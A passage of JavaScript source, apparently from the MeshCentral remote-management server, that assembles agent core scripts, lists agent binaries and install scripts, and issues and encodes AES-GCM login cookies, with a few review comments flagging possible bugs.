var state = obj.peerConnectivityByNode[serverid][nodeid];
if (state == null) return;
// If existing state exist, remove this connection
if ((state.connectivity & connectType) != 0) {
state.connectivity -= connectType; // Remove one connectivity mode
// If the node is completely disconnected, clean it up completely
if (state.connectivity == 0) { delete obj.peerConnectivityByNode[serverid][nodeid]; state.powerState = 0; }
}
// Clear node power state
if (connectType == 1) { state.agentPower = 0; } else if (connectType == 2) { state.ciraPower = 0; } else if (connectType == 4) { state.amtPower = 0; }
var powerState = 0;
if ((state.connectivity & 1) != 0) { powerState = state.agentPower; } else if ((state.connectivity & 2) != 0) { powerState = state.ciraPower; } else if ((state.connectivity & 4) != 0) { powerState = state.amtPower; }
if ((state.powerState == null) || (state.powerState != powerState)) { state.powerState = powerState; }
// Update the combined node state
var x = {}; x[nodeid] = 1;
obj.UpdateConnectivityState(x);
}
};
// Escape a code string
obj.escapeCodeString = function (str) {
const escapeCodeStringTable = { '\'': '\\\'', '\"': '\\"', '\\': '\\\\', '\b': '\\b', '\f': '\\f', '\n': '\\n', '\r': '\\r', '\t': '\\t' };
var r = '', c, cr, table;
for (var i = 0; i < str.length; i++) {
c = str[i];
table = escapeCodeStringTable[c];
if (table != null) {
r += table;
} else {
cr = c.charCodeAt(0);
if ((cr >= 32) && (cr <= 127)) { r += c; }
}
}
return r;
}
// Update the default mesh core
obj.updateMeshCore = function (func) {
// Figure out where meshcore.js is
var meshcorePath = obj.datapath;
if (obj.fs.existsSync(obj.path.join(meshcorePath, 'meshcore.js')) == false) {
meshcorePath = obj.path.join(__dirname, 'agents');
if (obj.fs.existsSync(obj.path.join(meshcorePath, 'meshcore.js')) == false) {
obj.defaultMeshCores = obj.defaultMeshCoresHash = { }; if (func != null) { func(false); } // meshcore.js not found
}
}
// Read meshcore.js and all .js files in the modules folder.
var meshCore = null, modulesDir = null;
const modulesAdd = {
'windows-amt': ['var addedModules = [];\r\n'],
'linux-amt': ['var addedModules = [];\r\n'],
'linux-noamt': ['var addedModules = [];\r\n']
};
// Read the recovery core if present
var meshRecoveryCore = null;
if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'recoverycore.js')) == true) {
try { meshRecoveryCore = obj.fs.readFileSync(obj.path.join(__dirname, 'agents', 'recoverycore.js')).toString(); } catch (ex) { }
if (meshRecoveryCore != null) {
modulesAdd['windows-recovery'] = ['var addedModules = [];\r\n'];
modulesAdd['linux-recovery'] = ['var addedModules = [];\r\n'];
}
}
// Read the agent recovery core if present
var meshAgentRecoveryCore = null;
if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcore_diagnostic.js')) == true) {
try { meshAgentRecoveryCore = obj.fs.readFileSync(obj.path.join(__dirname, 'agents', 'meshcore_diagnostic.js')).toString(); } catch (ex) { }
if (meshAgentRecoveryCore != null) {
modulesAdd['windows-agentrecovery'] = ['var addedModules = [];\r\n'];
modulesAdd['linux-agentrecovery'] = ['var addedModules = [];\r\n'];
}
}
if (obj.args.minifycore !== false) { try { meshCore = obj.fs.readFileSync(obj.path.join(meshcorePath, 'meshcore.min.js')).toString(); } catch (e) { } } // Favor minified meshcore if present.
if (meshCore == null) { try { meshCore = obj.fs.readFileSync(obj.path.join(meshcorePath, 'meshcore.js')).toString(); } catch (e) { } } // Use non-minified meshcore.
if (meshCore != null) {
var moduleDirPath = null;
if (obj.args.minifycore !== false) { try { moduleDirPath = obj.path.join(meshcorePath, 'modules_meshcore_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Favor minified modules if present.
if (modulesDir == null) { try { moduleDirPath = obj.path.join(meshcorePath, 'modules_meshcore'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified mofules.
if (modulesDir != null) {
for (var i in modulesDir) {
if (modulesDir[i].toLowerCase().endsWith('.js')) {
var moduleName = modulesDir[i].substring(0, modulesDir[i].length - 3);
if (moduleName.endsWith('.min')) { moduleName = moduleName.substring(0, moduleName.length - 4); } // Remove the ".min" for ".min.js" files.
var moduleData = [ 'try { addModule("', moduleName, '", "', obj.escapeCodeString(obj.fs.readFileSync(obj.path.join(moduleDirPath, modulesDir[i])).toString('binary')), '"); addedModules.push("', moduleName, '"); } catch (e) { }\r\n' ];
// Merge this module
// NOTE: "smbios" module makes some non-AI Linux segfault, only include for IA platforms.
if (moduleName.startsWith('amt-') || (moduleName == 'smbios')) {
// Add to IA / Intel AMT cores only
modulesAdd['windows-amt'].push(...moduleData);
modulesAdd['linux-amt'].push(...moduleData);
} else if (moduleName.startsWith('win-')) {
// Add to Windows cores only
modulesAdd['windows-amt'].push(...moduleData);
} else if (moduleName.startsWith('linux-')) {
// Add to Linux cores only
modulesAdd['linux-amt'].push(...moduleData);
modulesAdd['linux-noamt'].push(...moduleData);
} else {
// Add to all cores
modulesAdd['windows-amt'].push(...moduleData);
modulesAdd['linux-amt'].push(...moduleData);
modulesAdd['linux-noamt'].push(...moduleData);
}
// Merge this module to recovery modules if needed
if (modulesAdd['windows-recovery'] != null) {
if ((moduleName == 'win-console') || (moduleName == 'win-message-pump') || (moduleName == 'win-terminal')) {
modulesAdd['windows-recovery'].push(...moduleData);
}
}
// Merge this module to agent recovery modules if needed
if (modulesAdd['windows-agentrecovery'] != null) {
if ((moduleName == 'win-console') || (moduleName == 'win-message-pump') || (moduleName == 'win-terminal')) {
modulesAdd['windows-agentrecovery'].push(...moduleData);
}
}
}
}
}
// Add plugins to cores
if (obj.pluginHandler) { obj.pluginHandler.addMeshCoreModules(modulesAdd); }
// Merge the cores and compute the hashes
for (var i in modulesAdd) {
if ((i == 'windows-recovery') || (i == 'linux-recovery')) {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshRecoveryCore].join('');
} else if ((i == 'windows-agentrecovery') || (i == 'linux-agentrecovery')) {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshAgentRecoveryCore].join('');
} else {
obj.defaultMeshCores[i] = [obj.common.IntToStr(0), ...modulesAdd[i], meshCore].join('');
}
obj.defaultMeshCoresHash[i] = obj.crypto.createHash('sha384').update(obj.defaultMeshCores[i]).digest("binary");
obj.debug('main', 'Core module ' + i + ' is ' + obj.defaultMeshCores[i].length + ' bytes.');
//console.log('Core module ' + i + ' is ' + obj.defaultMeshCores[i].length + ' bytes.'); // DEBUG, Print the core size
//obj.fs.writeFile("C:\\temp\\" + i + ".js", obj.defaultMeshCores[i].substring(4)); // DEBUG, Write the core to file
}
}
// We are done creating all the mesh cores.
if (func != null) { func(true); }
};
// Update the default meshcmd
obj.updateMeshCmdTimer = 'notset';

// Rebuild the merged "meshcmd" script: read meshcmd.js (minified when allowed), stamp the current
// server version into it, prepend every module found in the modules_meshcmd folder as an
// addModule() call, and store the result in obj.defaultMeshCmd. A debounced file watcher re-runs
// this whenever meshcmd.js changes on disk.
// func (optional): callback, called with true on success or false when no meshcmd.js was found.
obj.updateMeshCmd = function (func) {
    // Figure out where meshcmd.js is and read it, favoring the minified version unless minifycore is disabled.
    var meshCmd = null, meshcmdPath, moduleAdditions = ['var addedModules = [];\r\n'], moduleDirPath, modulesDir = null;
    if ((obj.args.minifycore !== false) && (obj.fs.existsSync(obj.path.join(obj.datapath, 'meshcmd.min.js')))) { meshcmdPath = obj.path.join(obj.datapath, 'meshcmd.min.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
    else if (obj.fs.existsSync(obj.path.join(obj.datapath, 'meshcmd.js'))) { meshcmdPath = obj.path.join(obj.datapath, 'meshcmd.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
    else if ((obj.args.minifycore !== false) && (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcmd.min.js')))) { meshcmdPath = obj.path.join(__dirname, 'agents', 'meshcmd.min.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
    else if (obj.fs.existsSync(obj.path.join(__dirname, 'agents', 'meshcmd.js'))) { meshcmdPath = obj.path.join(__dirname, 'agents', 'meshcmd.js'); meshCmd = obj.fs.readFileSync(meshcmdPath).toString(); }
    else { obj.defaultMeshCmd = null; if (func != null) { func(false); } return; } // meshcmd.js not found. Fix: return here, otherwise meshCmd.replace() below throws on null.
    meshCmd = meshCmd.replace("'***Mesh*Cmd*Version***'", '\'' + getCurrentVerion() + '\'');
    // Figure out where the modules_meshcmd folder is.
    // NOTE(review): the first two probes join the folder name onto meshcmdPath, which is a file
    // path, not a directory - readdirSync then fails and we fall through to the __dirname probes.
    // Kept as-is; confirm whether the data-path probes were meant to use obj.datapath.
    if (obj.args.minifycore !== false) { try { moduleDirPath = obj.path.join(meshcmdPath, 'modules_meshcmd_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Favor minified modules if present.
    if (modulesDir == null) { try { moduleDirPath = obj.path.join(meshcmdPath, 'modules_meshcmd'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified modules.
    if (obj.args.minifycore !== false) { if (modulesDir == null) { try { moduleDirPath = obj.path.join(__dirname, 'agents', 'modules_meshcmd_min'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } } // Favor minified modules if present.
    if (modulesDir == null) { try { moduleDirPath = obj.path.join(__dirname, 'agents', 'modules_meshcmd'); modulesDir = obj.fs.readdirSync(moduleDirPath); } catch (e) { } } // Use non-minified modules.
    // Read all .js files in the meshcmd modules folder and merge each as an addModule() call.
    if (modulesDir != null) {
        for (var i in modulesDir) {
            if (modulesDir[i].toLowerCase().endsWith('.js')) {
                var moduleName = modulesDir[i].substring(0, modulesDir[i].length - 3);
                if (moduleName.endsWith('.min')) { moduleName = moduleName.substring(0, moduleName.length - 4); } // Remove the ".min" for ".min.js" files.
                moduleAdditions.push('try { addModule("', moduleName, '", "', obj.escapeCodeString(obj.fs.readFileSync(obj.path.join(moduleDirPath, modulesDir[i])).toString('binary')), '"); addedModules.push("', moduleName, '"); } catch (e) { }\r\n');
            }
        }
    }
    // Set the new default meshcmd.js
    moduleAdditions.push(meshCmd);
    obj.defaultMeshCmd = moduleAdditions.join('');
    if (func != null) { func(true); }
    // Monitor for changes in meshcmd.js, debounced to 5 seconds so a burst of writes only triggers one rebuild.
    if (obj.updateMeshCmdTimer === 'notset') {
        obj.updateMeshCmdTimer = null;
        obj.fs.watch(meshcmdPath, function (eventType, filename) {
            if (obj.updateMeshCmdTimer != null) { clearTimeout(obj.updateMeshCmdTimer); obj.updateMeshCmdTimer = null; }
            obj.updateMeshCmdTimer = setTimeout(function () { obj.updateMeshCmd(); }, 5000);
        });
    }
};
// List of possible mesh agent install scripts.
// id: numeric identifier used in /meshagents?script=<id> requests.
// localname: file name under the agents/ folder on the server.
// rname: file name offered to the remote downloader.
// linux: true when the script should be served with Unix line endings (see updateMeshAgentInstallScripts).
var meshAgentsInstallScriptList = {
1: { id: 1, localname: 'meshinstall-linux.sh', rname: 'meshinstall.sh', linux: true },
2: { id: 2, localname: 'meshinstall-initd.sh', rname: 'meshagent', linux: true },
5: { id: 5, localname: 'meshinstall-bsd-rcd.sh', rname: 'meshagent', linux: true }
};
// Update the list of available mesh agent install scripts.
// For each known script, read the file asynchronously, hash it with SHA-384, and publish its
// info (hash, path, data, download url, size) in obj.meshAgentInstallScripts keyed by script id.
// Scripts that fail to read are removed from the table.
obj.updateMeshAgentInstallScripts = function () {
    for (var scriptid in meshAgentsInstallScriptList) {
        var scriptpath = obj.path.join(__dirname, 'agents', meshAgentsInstallScriptList[scriptid].localname);
        try {
            var stream = obj.fs.createReadStream(scriptpath);
            // Attach the per-stream state before wiring handlers; stream events fire asynchronously,
            // so everything is in place by the time the first 'data' event arrives.
            stream.info = meshAgentsInstallScriptList[scriptid];
            stream.agentpath = scriptpath;
            stream.hash = obj.crypto.createHash('sha384'); // Fix: createHash takes (algorithm[, options]); passing the stream as a second argument was meaningless.
            stream.xdata = '';
            stream.on('data', function (data) { this.hash.update(data, 'binary'); this.xdata += data; });
            stream.on('error', function (data) {
                // If there is an error reading this file, make sure this agent is not in the agent table
                if (obj.meshAgentInstallScripts[this.info.id] != null) { delete obj.meshAgentInstallScripts[this.info.id]; }
            });
            stream.on('end', function () {
                // Add the agent to the agent table with all information and the hash
                obj.meshAgentInstallScripts[this.info.id] = Object.assign({}, this.info);
                obj.meshAgentInstallScripts[this.info.id].hash = this.hash.digest('hex');
                obj.meshAgentInstallScripts[this.info.id].path = this.agentpath;
                obj.meshAgentInstallScripts[this.info.id].data = this.xdata;
                obj.meshAgentInstallScripts[this.info.id].url = ((obj.args.notls == true) ? 'http://' : 'https://') + obj.certificates.CommonName + ':' + ((typeof obj.args.aliasport == 'number') ? obj.args.aliasport : obj.args.port) + '/meshagents?script=' + this.info.id;
                var stats = null;
                try { stats = obj.fs.statSync(this.agentpath); } catch (e) { }
                if (stats != null) { obj.meshAgentInstallScripts[this.info.id].size = stats.size; }
                // Place Unix line breaks on Linux scripts if not already present.
                if (obj.meshAgentInstallScripts[this.info.id].linux === true) { obj.meshAgentInstallScripts[this.info.id].data = obj.meshAgentInstallScripts[this.info.id].data.split('\r\n').join('\n') }
            });
        } catch (e) { }
    }
};
// List of possible mesh agents, keyed by architecture number.
// id: canonical architecture id              localname: file name under agents/ on the server
// rname: file name offered for download      desc: human readable description
// update: agent can be auto-updated          amt: build includes Intel AMT support
// platform: OS family                        core/rcore/arcore: default, recovery and agent-recovery mesh cores.
obj.meshAgentsArchitectureNumbers = {
0: { id: 0, localname: 'Unknown', rname: 'meshconsole.exe', desc: 'Unknown agent', update: false, amt: true, platform: 'unknown', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
1: { id: 1, localname: 'MeshConsole.exe', rname: 'meshconsole32.exe', desc: 'Windows x86-32 console', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
2: { id: 2, localname: 'MeshConsole64.exe', rname: 'meshconsole64.exe', desc: 'Windows x86-64 console', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
3: { id: 3, localname: 'MeshService-signed.exe', rname: 'meshagent32.exe', desc: 'Windows x86-32 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
4: { id: 4, localname: 'MeshService64-signed.exe', rname: 'meshagent64.exe', desc: 'Windows x86-64 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
5: { id: 5, localname: 'meshagent_x86', rname: 'meshagent', desc: 'Linux x86-32', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
6: { id: 6, localname: 'meshagent_x86-64', rname: 'meshagent', desc: 'Linux x86-64', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
7: { id: 7, localname: 'meshagent_mips', rname: 'meshagent', desc: 'Linux MIPS', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
8: { id: 8, localname: 'MeshAgent-Linux-XEN-x86-32', rname: 'meshagent', desc: 'XEN x86-64', update: true, amt: false, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
9: { id: 9, localname: 'meshagent_arm', rname: 'meshagent', desc: 'Linux ARM5', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
10: { id: 10, localname: 'MeshAgent-Linux-ARM-PlugPC', rname: 'meshagent', desc: 'Linux ARM PlugPC', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
11: { id: 11, localname: 'meshagent_osx-x86-32', rname: 'meshosx', desc: 'Apple OSX x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
12: { id: 12, localname: 'MeshAgent-Android-x86', rname: 'meshandroid', desc: 'Android x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
13: { id: 13, localname: 'meshagent_pogo', rname: 'meshagent', desc: 'Linux ARM PogoPlug', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
14: { id: 14, localname: 'MeshAgent-Android-APK', rname: 'meshandroid', desc: 'Android Market', update: false, amt: false, platform: 'android', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from Google Play
15: { id: 15, localname: 'meshagent_poky', rname: 'meshagent', desc: 'Linux Poky x86-32', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
16: { id: 16, localname: 'meshagent_osx-x86-64', rname: 'meshagent', desc: 'Apple OSX x86-64', update: true, amt: false, platform: 'osx', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
17: { id: 17, localname: 'MeshAgent-ChromeOS', rname: 'meshagent', desc: 'Google ChromeOS', update: false, amt: false, platform: 'chromeos', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from Chrome store
18: { id: 18, localname: 'meshagent_poky64', rname: 'meshagent', desc: 'Linux Poky x86-64', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
19: { id: 19, localname: 'meshagent_x86_nokvm', rname: 'meshagent', desc: 'Linux x86-32 NoKVM', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
20: { id: 20, localname: 'meshagent_x86-64_nokvm', rname: 'meshagent', desc: 'Linux x86-64 NoKVM', update: true, amt: true, platform: 'linux', core: 'linux-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
21: { id: 21, localname: 'MeshAgent-WinMinCore-Console-x86-32.exe', rname: 'meshagent.exe', desc: 'Windows MinCore Console x86-32', update: true, amt: false, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
22: { id: 22, localname: 'MeshAgent-WinMinCore-Service-x86-64.exe', rname: 'meshagent.exe', desc: 'Windows MinCore Service x86-32', update: true, amt: false, platform: 'win32', core: 'windows-amt', rcore: 'windows-recovery', arcore: 'windows-agentrecovery' },
23: { id: 23, localname: 'MeshAgent-NodeJS', rname: 'meshagent', desc: 'NodeJS', update: false, amt: false, platform: 'node', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Get this one from NPM
24: { id: 24, localname: 'meshagent_arm-linaro', rname: 'meshagent', desc: 'Linux ARM Linaro', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' },
25: { id: 25, localname: 'meshagent_armhf', rname: 'meshagent', desc: 'Linux ARM - HardFloat', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // "armv6l" and "armv7l"
26: { id: 26, localname: 'meshagent_arm64', rname: 'meshagent', desc: 'Linux ARMv8-64', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // "aarch64"
27: { id: 27, localname: 'meshagent_armhf2', rname: 'meshagent', desc: 'Linux ARM - HardFloat', update: true, amt: false, platform: 'linux', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Raspbian 7 2015-02-02 for old Raspberry Pi.
30: { id: 30, localname: 'meshagent_freebsd_x86-64', rname: 'meshagent', desc: 'FreeBSD x86-64', update: true, amt: false, platform: 'freebsd', core: 'linux-noamt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // FreeBSD x64
// NOTE(review): the two unsigned Windows entries below use 'linux-recovery'/'linux-agentrecovery'
// cores despite platform 'win32', unlike entries 3 and 4 - confirm this is intentional.
10003: { id: 3, localname: 'MeshService.exe', rname: 'meshagent.exe', desc: 'Windows x86-32 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' }, // Unsigned version of the Windows MeshAgent x86
10004: { id: 4, localname: 'MeshService64.exe', rname: 'meshagent.exe', desc: 'Windows x86-64 service', update: true, amt: true, platform: 'win32', core: 'windows-amt', rcore: 'linux-recovery', arcore: 'linux-agentrecovery' } // Unsigned version of the Windows MeshAgent x64
};
// Update the list of available mesh agents.
// Scans the agents/ folder for every known architecture number, records each binary's path,
// download url and size (plus parsed PE header data for Windows binaries), optionally pre-loads
// the binary into RAM, and hashes each one. "func" (optional) is called once every discovered
// agent has finished hashing.
obj.updateMeshAgentsTable = function (func) {
var archcount = 0; // Number of agents found on disk; counted down as each hash completes.
for (var archid in obj.meshAgentsArchitectureNumbers) {
var agentpath = obj.path.join(__dirname, 'agents', obj.meshAgentsArchitectureNumbers[archid].localname);
// Fetch all the agent binary information
var stats = null;
try { stats = obj.fs.statSync(agentpath); } catch (e) { }
if ((stats != null)) {
// If file exists
archcount++;
obj.meshAgentBinaries[archid] = Object.assign({}, obj.meshAgentsArchitectureNumbers[archid]);
obj.meshAgentBinaries[archid].path = agentpath;
obj.meshAgentBinaries[archid].url = ((obj.args.notls == true) ? 'http://' : 'https://') + obj.certificates.CommonName + ':' + ((typeof obj.args.aliasport == 'number') ? obj.args.aliasport : obj.args.port) + '/meshagents?id=' + archid;
obj.meshAgentBinaries[archid].size = stats.size;
// If this is a windows binary, pull binary information
if (obj.meshAgentsArchitectureNumbers[archid].platform == 'win32') {
try { obj.meshAgentBinaries[archid].pe = obj.exeHandler.parseWindowsExecutable(agentpath); } catch (e) { }
}
// If agents must be stored in RAM or if this is a Windows 32/64 agent, load the agent in RAM.
if ((obj.args.agentsinram === true) || (((archid == 3) || (archid == 4)) && (obj.args.agentsinram !== false))) {
if ((archid == 3) || (archid == 4)) {
// Load the agent with a random msh added to it.
// NOTE(review): "new require('stream').Duplex()" depends on JS "new" precedence quirks;
// "new (require('stream').Duplex)()" would be the conventional spelling - confirm intent.
var outStream = new require('stream').Duplex();
outStream.meshAgentBinary = obj.meshAgentBinaries[archid];
outStream.meshAgentBinary.randomMsh = Buffer.from(obj.crypto.randomBytes(64), 'binary').toString('base64');
outStream.bufferList = [];
outStream._write = function (chunk, encoding, callback) { this.bufferList.push(chunk); if (callback) callback(); }; // Append the chuck.
outStream._read = function (size) { }; // Do nothing, this is not going to be called.
outStream.on('finish', function () { this.meshAgentBinary.data = Buffer.concat(this.bufferList); this.meshAgentBinary.size = this.meshAgentBinary.data.length; delete this.bufferList; }) // Merge all chunks
obj.exeHandler.streamExeWithMeshPolicy(
{
platform: 'win32',
sourceFileName: agentpath,
destinationStream: outStream,
randomPolicy: true, // Indicates that the msh policy is random data.
msh: outStream.meshAgentBinary.randomMsh,
peinfo: obj.meshAgentBinaries[archid].pe
});
} else {
// Load the agent as-is
obj.meshAgentBinaries[archid].data = obj.fs.readFileSync(agentpath);
}
}
// Hash the binary
var hashStream = obj.crypto.createHash('sha384');
hashStream.archid = archid;
hashStream.on('data', function (data) {
obj.meshAgentBinaries[this.archid].hash = data.toString('binary');
obj.meshAgentBinaries[this.archid].hashhex = data.toString('hex');
// Once every agent counted above has been hashed, fire the completion callback.
if ((--archcount == 0) && (func != null)) { func(); }
});
var options = { sourcePath: agentpath, targetStream: hashStream, platform: obj.meshAgentsArchitectureNumbers[archid].platform };
if (obj.meshAgentBinaries[archid].pe != null) { options.peinfo = obj.meshAgentBinaries[archid].pe; }
obj.exeHandler.hashExecutableFile(options);
}
}
if ((obj.meshAgentBinaries[3] == null) && (obj.meshAgentBinaries[10003] != null)) { obj.meshAgentBinaries[3] = obj.meshAgentBinaries[10003]; } // If only the unsigned windows binaries are present, use them.
if ((obj.meshAgentBinaries[4] == null) && (obj.meshAgentBinaries[10004] != null)) { obj.meshAgentBinaries[4] = obj.meshAgentBinaries[10004]; } // If only the unsigned windows binaries are present, use them.
};
// Generate a time limited user login token
// Validates the "user/<domain>/<name>" identifier, confirms the user exists in the database,
// then returns (via func) a login cookie encoded with the persisted LoginCookieEncryptionKey,
// generating and storing a fresh key when none is usable.
obj.getLoginToken = function (userid, func) {
    // Reject anything that is not a well formed user identifier.
    if ((userid == null) || (typeof userid != 'string')) { func('Invalid userid.'); return; }
    var parts = userid.split('/');
    if ((parts == null) || (parts.length != 3) || (parts[0] != 'user')) { func('Invalid userid.'); return; }
    obj.db.Get(userid, function (err, docs) {
        if ((err == null) && (docs != null) && (docs.length != 0)) {
            // The user exists; load the login cookie encryption key from the database.
            obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
                var keyIsUsable = (docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160);
                if (keyIsUsable) {
                    // Key is present, use it.
                    obj.loginCookieEncryptionKey = Buffer.from(docs[0].key, 'hex');
                    func(obj.encodeCookie({ u: userid, a: 3 }, obj.loginCookieEncryptionKey));
                } else {
                    // Key is not present, generate one and persist it before returning the token.
                    obj.loginCookieEncryptionKey = obj.generateCookieKey();
                    obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() }, function () { func(obj.encodeCookie({ u: userid, a: 3 }, obj.loginCookieEncryptionKey)); });
                }
            });
        } else {
            func('User ' + userid + ' not found.');
        }
    });
};
// Show the user login token generation key
// Returns (via func) the hex form of the LoginCookieEncryptionKey stored in the database,
// generating and persisting a fresh one when no usable key exists.
obj.showLoginTokenKey = function (func) {
    // Load the login cookie encryption key from the database.
    obj.db.Get('LoginCookieEncryptionKey', function (err, docs) {
        var keyIsUsable = (docs.length > 0) && (docs[0].key != null) && (obj.args.logintokengen == null) && (docs[0].key.length >= 160);
        if (keyIsUsable) { func(docs[0].key); return; } // Key is present, return it as stored (hex).
        // No usable key: generate one, store it, then return it in hex form.
        obj.loginCookieEncryptionKey = obj.generateCookieKey();
        obj.db.Set({ _id: 'LoginCookieEncryptionKey', key: obj.loginCookieEncryptionKey.toString('hex'), time: Date.now() }, function () { func(obj.loginCookieEncryptionKey.toString('hex')); });
    });
};
// Generate a cryptographic key used to encode and decode cookies
// 80 random bytes: the cookie codecs use the first 48 as the HMAC-SHA384 key and
// bytes 48..80 as the AES-256 key.
obj.generateCookieKey = function () {
    var randomKeyBytes = obj.crypto.randomBytes(80);
    return Buffer.from(randomKeyBytes, 'binary');
};
// Encode an object as a cookie using a key using AES-GCM. (key must be 32 bytes or more)
// Returns the encoded cookie string, or null when encryption fails.
obj.encodeCookie = function (o, key) {
    try {
        if (key == null) { key = obj.serverKey; }
        o.time = Math.floor(Date.now() / 1000); // Add the cookie creation time (in seconds)
        // Cookie layout: 12 byte IV, then the 16 byte GCM auth tag, then the ciphertext.
        const iv = Buffer.from(obj.crypto.randomBytes(12), 'binary');
        const cipher = obj.crypto.createCipheriv('aes-256-gcm', key.slice(0, 32), iv);
        const crypted = Buffer.concat([cipher.update(JSON.stringify(o), 'utf8'), cipher.final()]);
        const packed = Buffer.concat([iv, cipher.getAuthTag(), crypted]);
        // Encode (base64 unless overridden) and swap '+' / '/' for cookie-safe characters.
        const encoded = packed.toString(obj.args.cookieencoding ? obj.args.cookieencoding : 'base64').replace(/\+/g, '@').replace(/\//g, '$');
        obj.debug('cookie', 'Encoded AESGCM cookie: ' + JSON.stringify(o));
        return encoded;
    } catch (ex) { obj.debug('cookie', 'ERR: Failed to encode AESGCM cookie due to exception: ' + ex); return null; }
};
// Decode a cookie back into an object using a key using AES256-GCM or AES128-CBC/HMAC-SHA386. Return null if it's not a valid cookie. (key must be 32 bytes or more)
// Tries the AES-GCM format first and falls back to the AES-CBC/HMAC format. Cookies carrying a
// "once" value are single-use: a successful decode records the value in RAM and any later decode
// of the same cookie returns null until the stored entry expires.
obj.decodeCookie = function (cookie, key, timeout) {
var r = obj.decodeCookieAESGCM(cookie, key, timeout);
if (r == null) { r = obj.decodeCookieAESSHA(cookie, key, timeout); }
// A cookie that is all-lowercase or all-uppercase suggests hex encoding while the server expected base64.
if ((r == null) && (obj.args.cookieencoding == null) && ((cookie == cookie.toLowerCase()) || (cookie == cookie.toUpperCase()))) {
obj.debug('cookie', 'Upper/Lowercase cookie, try "CookieEncoding":"hex" in settings section of config.json.');
console.log('Upper/Lowercase cookie, try "CookieEncoding":"hex" in settings section of config.json.');
}
if ((r != null) && (typeof r.once == 'string') && (r.once.length > 0)) {
// This cookie must only be used once.
if (timeout == null) { timeout = 2; }
if (obj.cookieUseOnceTable[r.once] == null) {
// Keep the used entry 3 minutes past the cookie's own expiration time.
const ctimeout = (((r.expire) == null || (typeof r.expire != 'number')) ? (r.time + ((timeout + 3) * 60000)) : (r.time + ((r.expire + 3) * 60000)));
// Store the used cookie in RAM
obj.cookieUseOnceTable[r.once] = ctimeout;
// Store the used cookie in the database
// TODO
// Send the used cookie to peer servers
// TODO
// Clean up the used table every 20 insertions, dropping entries that have expired.
if (++obj.cookieUseOnceTableCleanCounter > 20) {
const now = Date.now();
for (var i in obj.cookieUseOnceTable) { if (obj.cookieUseOnceTable[i] < now) { delete obj.cookieUseOnceTable[i]; } }
obj.cookieUseOnceTableCleanCounter = 0;
}
} else { return null; } // This cookie was already used, reject it.
}
return r;
}
// Decode a cookie back into an object using a key using AES256-GCM. Return null if it's not a valid cookie. (key must be 32 bytes or more)
obj.decodeCookieAESGCM = function (cookie, key, timeout) {
    try {
